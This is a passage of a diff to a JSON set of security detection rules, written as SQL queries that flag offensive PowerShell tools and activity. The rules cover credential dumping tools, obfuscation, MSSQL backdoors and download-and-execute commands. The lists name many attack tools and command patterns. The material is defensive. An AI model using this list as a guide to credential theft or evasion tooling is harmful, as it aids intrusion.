'%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSI Installation From Suspicious Locations", - "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects MSI package installation from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_msi_install_from_susp_locations.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", + "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_invoke_obfuscation_via_compress.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE 